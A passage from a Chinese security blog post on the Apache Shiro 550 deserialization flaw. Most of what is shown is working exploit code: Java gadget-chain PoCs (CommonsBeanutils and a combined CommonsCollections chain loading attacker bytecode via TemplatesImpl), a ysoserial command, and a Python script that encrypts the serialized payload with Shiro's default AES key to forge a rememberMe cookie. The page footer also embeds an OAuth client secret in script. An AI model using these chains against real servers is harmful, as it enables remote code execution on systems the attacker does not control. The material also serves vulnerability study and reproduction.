bytecodes.set(templates,codes);</span><br><span class="line">        <span class="type">Field</span> <span class="variable">tfactoryfield</span> <span class="operator">=</span> c1.getDeclaredField(<span class="string">"_tfactory"</span>);</span><br><span class="line">        tfactoryfield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        tfactoryfield.set(templates,<span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">//CB</span></span><br><span class="line">        <span class="type">TransformingComparator</span> <span class="variable">transformingComparator</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TransformingComparator</span>&lt;&gt;(<span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>&lt;&gt;(<span class="number">1</span>));</span><br><span class="line">        BeanComparator&lt;Object&gt; objectBeanComparator = <span class="keyword">new</span> <span class="title class_">BeanComparator</span>&lt;&gt;(<span class="string">"outputProperties"</span>,<span class="keyword">new</span> <span class="title class_">AttrCompare</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">//CC2</span></span><br><span class="line">        PriorityQueue&lt;Object&gt; priorityqueue = <span class="keyword">new</span> <span class="title class_">PriorityQueue</span>&lt;&gt;(transformingComparator);</span><br><span class="line">        priorityqueue.add(templates);</span><br><span class="line">        priorityqueue.add(<span class="number">1</span>);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">c3</span> <span class="operator">=</span> priorityqueue.getClass();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">comparatorfield</span> <span class="operator">=</span> c3.getDeclaredField(<span class="string">"comparator"</span>);</span><br><span class="line">        comparatorfield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        comparatorfield.set(priorityqueue,objectBeanComparator);</span><br><span class="line"></span><br><span class="line">        utils.tools.serialize(priorityqueue);</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p><strong>ysoserial</strong></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">java -jar ysoserial-all.jar CommonsBeanutils1 calc &gt;ser.bin</span><br></pre></td></tr></tbody></table></figure>
<p>这里打shiro可能会失败，原因是<strong>ysoserial使用的cb库版本为1.9，可能与shiro自带的cb版本不对，从而失败</strong></p>
<h3 id="有cc依赖"><a href="#有cc依赖" class="headerlink" title="有cc依赖"></a>有cc依赖</h3><h4 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h4><p>常规的链子都会用到Transfer数组，而shiro和tomcat的类加载机制，使其在反序列化的时候无法加载这个数组（具体原因…），导致攻击链失效<br>因此需要避免使用数组，而这条链就是没有使用数组</p>
<h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p>CC3+CC2+CC6<br>动态类加载+InvokeTransformer+TideEntry-hashmap入口类</p>
<h4 id="再度分析"><a href="#再度分析" class="headerlink" title="再度分析"></a>再度分析</h4><p>使用cc3中的动态类加载<br>将cc3前面部分拿过来</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">//cc3</span></span><br><span class="line">TemplatesImpl templates= <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line"></span><br><span class="line">Class tc=templates.getClass();</span><br><span class="line"><span class="type">Field</span> <span class="variable">namefield</span> <span class="operator">=</span> tc.getDeclaredField(<span class="string">"_name"</span>);</span><br><span class="line">namefield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">namefield.set(templates,<span class="string">"aaa"</span>);</span><br><span class="line"><span class="type">Field</span> <span class="variable">bytecodefield</span> <span class="operator">=</span> tc.getDeclaredField(<span class="string">"_bytecodes"</span>);</span><br><span class="line">bytecodefield.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="comment">//赋给我们的字节码,二维数组，代码会循环遍历</span></span><br><span class="line"><span class="type">byte</span>[] code= Files.readAllBytes(Paths.get(<span class="string">"D:\\coderesp\\java\\learn\\exp\\target\\classes\\org\\example\\test.class"</span>));;</span><br><span class="line"><span class="type">byte</span> [][]  codes={code};</span><br><span class="line">bytecodefield.set(templates,codes);</span><br><span class="line"></span><br><span class="line"><span class="type">Field</span> <span class="variable">tfactoryfield</span> <span class="operator">=</span> tc.getDeclaredField(<span class="string">"_tfactory"</span>);</span><br><span class="line">tfactoryfield.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="comment">//在readObject中赋值了new TransformerFactoryImpl()</span></span><br><span class="line">tfactoryfield.set(templates,<span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br></pre></td></tr></tbody></table></figure>
<p>InvokeTransformer可以直接调用newTransformer方法进行类加载<br>入口类</p>
<ul>
<li>HashMap.readObject()会触发hashCode方法</li>
<li>TiedMapEntry中的HashCode调用了getValue(),getVaule中调了get</li>
<li>LazyMap 这个类的 get 方法中出现了 .transform 方法</li>
</ul>
<p>因此只需要将TiedMapEntry放入LazyMap ，再把TiedMapEntry放入hashmap<br>就会触发LazyMap中的key的get,</p>
<h4 id="最终poc"><a href="#最终poc" class="headerlink" title="最终poc"></a>最终poc</h4><figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.xml.transform.TransformerConfigurationException;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Files;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Paths;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">c11</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NoSuchFieldException, IllegalAccessException, IOException, TransformerConfigurationException {</span><br><span class="line"></span><br><span class="line">        <span class="comment">//cc3</span></span><br><span class="line">        TemplatesImpl templates= <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line"></span><br><span class="line">        Class tc=templates.getClass();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">namefield</span> <span class="operator">=</span> tc.getDeclaredField(<span class="string">"_name"</span>);</span><br><span class="line">        namefield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        namefield.set(templates,<span class="string">"aaa"</span>);</span><br><span class="line">        <span class="type">Field</span> <span class="variable">bytecodefield</span> <span class="operator">=</span> tc.getDeclaredField(<span class="string">"_bytecodes"</span>);</span><br><span class="line">        bytecodefield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="comment">//赋给我们的字节码,二维数组，代码会循环遍历</span></span><br><span class="line">        <span class="type">byte</span>[] code= Files.readAllBytes(Paths.get(<span class="string">"D:\\coderesp\\java\\learn\\exp\\target\\classes\\org\\example\\test.class"</span>));;</span><br><span class="line">        <span class="type">byte</span> [][]  codes={code};</span><br><span class="line">        bytecodefield.set(templates,codes);</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">tfactoryfield</span> <span class="operator">=</span> tc.getDeclaredField(<span class="string">"_tfactory"</span>);</span><br><span class="line">        tfactoryfield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="comment">//在readObject中赋值了new TransformerFactoryImpl()</span></span><br><span class="line">        tfactoryfield.set(templates,<span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">//CC2</span></span><br><span class="line">        <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">"newTransformer"</span>,<span class="literal">null</span>,<span class="literal">null</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="comment">//CC6</span></span><br><span class="line">        HashMap&lt;Object, Object&gt; hashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        hashMap.put(<span class="string">"value"</span>,<span class="string">"hu"</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; decoratemap=LazyMap.decorate(hashMap,<span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(<span class="number">1</span>));</span><br><span class="line">        TiedMapEntry tiedMapEntry=<span class="keyword">new</span> <span class="title class_">TiedMapEntry</span>(decoratemap,templates);</span><br><span class="line">        <span class="comment">//tidemapentry-&gt;内嵌LazyMap-&gt;内嵌HashMap,再放入hashmap</span></span><br><span class="line">        HashMap&lt;Object,Object&gt; map2=<span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        map2.put(tiedMapEntry,<span class="string">"sss"</span>);</span><br><span class="line">        decoratemap.remove(templates);</span><br><span class="line">        Class c=decoratemap.getClass();</span><br><span class="line">        Field factory=c.getDeclaredField(<span class="string">"factory"</span>);</span><br><span class="line">        factory.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        factory.set(decoratemap,invokerTransformer);</span><br><span class="line">        utils.tools.serialize(map2);</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<h2 id="AES-base64加密脚本"><a href="#AES-base64加密脚本" class="headerlink" title="AES+base64加密脚本"></a>AES+base64加密脚本</h2><figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">convert_bin</span>(<span class="params">file</span>):</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(file,<span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">return</span> f.read()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">AES_enc</span>(<span class="params">data</span>):</span><br><span class="line">    BS=AES.block_size</span><br><span class="line">    pad=<span class="keyword">lambda</span> s:s+((BS-<span class="built_in">len</span>(s)%BS)*<span class="built_in">chr</span>(BS-<span class="built_in">len</span>(s)%BS)).encode()</span><br><span class="line">    key=<span class="string">"kPH+bIxk5D2deZiIxcaaaA=="</span></span><br><span class="line">    mode=AES.MODE_CBC</span><br><span class="line">    iv=uuid.uuid4().<span class="built_in">bytes</span></span><br><span class="line">    encryptor=AES.new(base64.b64decode(key),mode,iv)</span><br><span class="line">    ciphertext=base64.b64encode(iv+encryptor.encrypt(pad(data))).decode()</span><br><span class="line">    <span class="keyword">return</span> ciphertext</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">"__main__"</span>:</span><br><span class="line">    data=convert_bin(<span class="string">"ser.bin"</span>)</span><br><span class="line">    <span class="built_in">print</span>(AES_enc(data))</span><br></pre></td></tr></tbody></table></figure>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="tag">java反序列化漏洞</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/java%E5%AE%89%E5%85%A8/" rel="tag">java安全</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/shiro/" rel="tag">shiro</a></li></ul>


    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="https://pic.3gbizhi.com/uploads/20231128/afb73976f07fe2c24c3480fd495895f6.jpg" data-sizes="auto" alt="Tomcat 漏洞复现集合" class="lazyload">
          
        
        <a href="/2024/05/13/Tomcat-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E9%9B%86%E5%90%88/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            Tomcat 漏洞复现集合
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://blog.yyjccc.xyz/images/cover/4.jpg" data-sizes="auto" alt="java Agent" class="lazyload">
        
      
      <a href="/2024/05/04/java-Agent/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          java Agent
        
      </h3>
    </div>
    
  </nav>


  
</article>




  <div id="comments" class="gtcomment"></div>



</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#shiro550"><span class="toc-number">1.</span> <span class="toc-text">shiro550</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E9%83%A8%E7%BD%B2"><span class="toc-number">1.2.</span> <span class="toc-text">环境部署</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B%E8%B0%83%E8%AF%95"><span class="toc-number">1.3.</span> <span class="toc-text">过程调试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%A0%E5%AF%86"><span class="toc-number">1.3.1.</span> <span class="toc-text">加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E5%AF%86"><span class="toc-number">1.3.2.</span> <span class="toc-text">解密</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-number">1.4.</span> <span class="toc-text">利用链</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#URLDNS%E9%93%BE%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.4.1.</span> <span class="toc-text">URLDNS链探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B2%A1%E6%9C%89cc%E4%BE%9D%E8%B5%96"><span class="toc-number">1.4.2.</span> <span class="toc-text">没有cc依赖</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#cb%E6%BC%8F%E6%B4%9E%E7%82%B9"><span class="toc-number">1.4.2.1.</span> <span class="toc-text">cb漏洞点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%93%BE%E5%AD%90%E5%88%86%E6%9E%90"><span class="toc-number">1.4.2.2.</span> <span class="toc-text">链子分析</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%89cc%E4%BE%9D%E8%B5%96"><span class="toc-number">1.4.3.</span> <span class="toc-text">有cc依赖</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">1.4.3.1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">1.4.3.2.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%8D%E5%BA%A6%E5%88%86%E6%9E%90"><span class="toc-number">1.4.3.3.</span> <span class="toc-text">再度分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%80%E7%BB%88poc"><span class="toc-number">1.4.3.4.</span> <span class="toc-text">最终poc</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AES-base64%E5%8A%A0%E5%AF%86%E8%84%9A%E6%9C%AC"><span class="toc-number">1.5.</span> <span class="toc-text">AES+base64加密脚本</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">43</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">6</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">64</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2023-2024
      <span class="footer-info-sep"></span>
      Yyjccc
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        147.5k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        10:03
      </div>
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#shiro550"><span class="toc-number">1.</span> <span class="toc-text">shiro550</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E9%83%A8%E7%BD%B2"><span class="toc-number">1.2.</span> <span class="toc-text">环境部署</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B%E8%B0%83%E8%AF%95"><span class="toc-number">1.3.</span> <span class="toc-text">过程调试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%A0%E5%AF%86"><span class="toc-number">1.3.1.</span> <span class="toc-text">加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E5%AF%86"><span class="toc-number">1.3.2.</span> <span class="toc-text">解密</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-number">1.4.</span> <span class="toc-text">利用链</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#URLDNS%E9%93%BE%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.4.1.</span> <span class="toc-text">URLDNS链探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B2%A1%E6%9C%89cc%E4%BE%9D%E8%B5%96"><span class="toc-number">1.4.2.</span> <span class="toc-text">没有cc依赖</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#cb%E6%BC%8F%E6%B4%9E%E7%82%B9"><span class="toc-number">1.4.2.1.</span> <span class="toc-text">cb漏洞点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%93%BE%E5%AD%90%E5%88%86%E6%9E%90"><span class="toc-number">1.4.2.2.</span> <span class="toc-text">链子分析</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%89cc%E4%BE%9D%E8%B5%96"><span class="toc-number">1.4.3.</span> <span class="toc-text">有cc依赖</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">1.4.3.1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">1.4.3.2.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%8D%E5%BA%A6%E5%88%86%E6%9E%90"><span class="toc-number">1.4.3.3.</span> <span class="toc-text">再度分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%80%E7%BB%88poc"><span class="toc-number">1.4.3.4.</span> <span class="toc-text">最终poc</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AES-base64%E5%8A%A0%E5%AF%86%E8%84%9A%E6%9C%AC"><span class="toc-number">1.5.</span> <span class="toc-text">AES+base64加密脚本</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">43</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">6</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">64</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div class="reimu-search-input" id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/images/reimu.png"/>
        </div>
      </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>






  
<script src="https://npm.webcache.cn/gitalk/dist/gitalk.min.js" data-pjax></script>

  
  <script data-pjax>
    var gitalkId = location.pathname;
    var gitalk = new Gitalk({
      clientID: '0efb4a442bc09d1ba17e',
      clientSecret: 'd26f520fef841de4f4388029a0d5c0f4730357cf',
      repo: 'https://github.com/Yyjccc/yyjccc.github.io.git',
      owner: 'Yyjccc',
      admin: "Yyjccc",
      id: gitalkId, // Ensure uniqueness and length less than 50
      distractionFreeMode: false // Facebook-like distraction free mode
    })
    if (document.getElementById('comments')) {
      gitalk.render('comments')
    }
  </script>







  
<script src="/js/generator_search.js" defer></script>






  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>





  <script>
    function initLive2d() {
      live2d.init("https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/", {themeTipsPath: ""});
    }
  </script>
  
<script src="https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/js/live2d-autoload.js" onload="initLive2d &amp;&amp; initLive2d()" async></script>




  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    quicklink.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.0-alpha.1' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  

<script data-pjax>
  var updateTime = _$('#post-update-time')?.innerHTML;

  if (updateTime) {
    const update = new Date(updateTime);
    const now = new Date();
    const diff = now - update;
    const days = diff / 86400000;
    const { daysAgo, message: template } = window.outdate;
    if (days >= daysAgo) {
      const message = template.replace(/{time}/, updateTime);
